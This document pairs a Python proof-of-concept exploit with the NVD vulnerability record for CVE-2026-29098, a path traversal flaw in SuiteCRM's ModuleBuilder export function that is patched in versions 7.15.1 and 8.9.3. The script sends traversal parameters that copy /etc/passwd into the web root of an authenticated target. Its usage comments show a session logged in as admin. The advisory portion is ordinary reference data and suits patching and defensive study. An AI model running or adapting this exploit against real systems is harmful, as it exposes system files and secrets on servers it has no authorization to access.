CVE-2026-29098

import requests def exploit(target_url, session): """ PoC for CVE-2026-29098 Path Traversal in SuiteCRM. Copies /etc/passwd to the web root. """ # The endpoint vulnerable to path traversal url = f"{target_url}/index.php" # Payload parameters to traverse to /etc/passwd data = { "module": "ModuleBuilder", "action": "exportCustom", "modules": "../../../../../../etc", # Path traversal sequence "name": "passwd" } headers = { "Content-Type": "application/x-www-form-urlencoded" } try: response = session.post(url, data=data, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check the web root for the 'passwd' file.") else: print(f"[-] Exploit failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") # Usage example # session = requests.Session() # session.post("http://target/login", auth=("admin", "password")) # exploit("http://target", session)

{"cve": {"id": "CVE-2026-29098", "sourceIdentifier": "[email protected]", "published": "2026-03-19T23:16:41.747", "lastModified": "2026-03-24T14:48:30.840", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to versions 7.15.1 and 8.9.3, the `action_exportCustom` function in `modules/ModuleBuilder/controller.php` fails to properly neutralize path traversal sequences in the `$modules` and `$name` parameters. Both parameters later reach the `exportCustom` function in `modules/ModuleBuilder/MB/MBPackage.php` where they are both utilized in constructing s paths for file reading and writing. As such, it is possible for a user with access to the ModuleBuilder module, generally an administrator, to craft a request that can copy the content of any readable directory on the underlying host into the web root, making them readable. As the `ModuleBuilder` module is part of both major versions 7 and 8, both current major versions are affected. This vulnerability allows an attacker to copy any readable directory into the web root. This includes system files like the content of `/etc, or the root directory of the web server, potentially exposing secrets and environment variables. Versions 7.15.1 and 8.9.3 patch the issue."}, {"lang": "es", "value": "SuiteCRM es una aplicación de software de Gestión de Relaciones con Clientes (CRM) de código abierto y lista para empresas. Antes de las versiones 7.15.1 y 8.9.3, la función 'action_exportCustom' en 'modules/ModuleBuilder/controller.php' no logra neutralizar correctamente las secuencias de salto de ruta en los parámetros '$modules' y '$name'. Ambos parámetros luego alcanzan la función 'exportCustom' en 'modules/ModuleBuilder/MB/MBPackage.php' donde ambos son utilizados en la construcción de rutas para la lectura y escritura de archivos. Como tal, es posible que un usuario con acceso al módulo ModuleBuilder, generalmente un administrador, elabore una solicitud que pueda copiar el contenido de cualquier directorio legible en el host subyacente en la raíz web, haciéndolos legibles. Como el módulo 'ModuleBuilder' es parte de ambas versiones principales 7 y 8, ambas versiones principales actuales están afectadas. Esta vulnerabilidad permite a un atacante copiar cualquier directorio legible en la raíz web. Esto incluye archivos del sistema como el contenido de '/etc', o el directorio raíz del servidor web, exponiendo potencialmente secretos y variables de entorno. Las versiones 7.15.1 y 8.9.3 parchean el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-23"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.15.1", "matchCriteriaId": "73648654-E7F6-47CF-8E01-19BBFF737C99"}, {"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.9.3", "matchCriteriaId": "C7E15DD3-A934-40A2-8B43-ABCCBB53CBCF"}]}]}], "references": [{"url": "https://docs.suitecrm.com/admin/releases/7.15.x", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/SuiteCRM/SuiteCRM/security/advisories/GHSA-6858-fhw5-56gf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}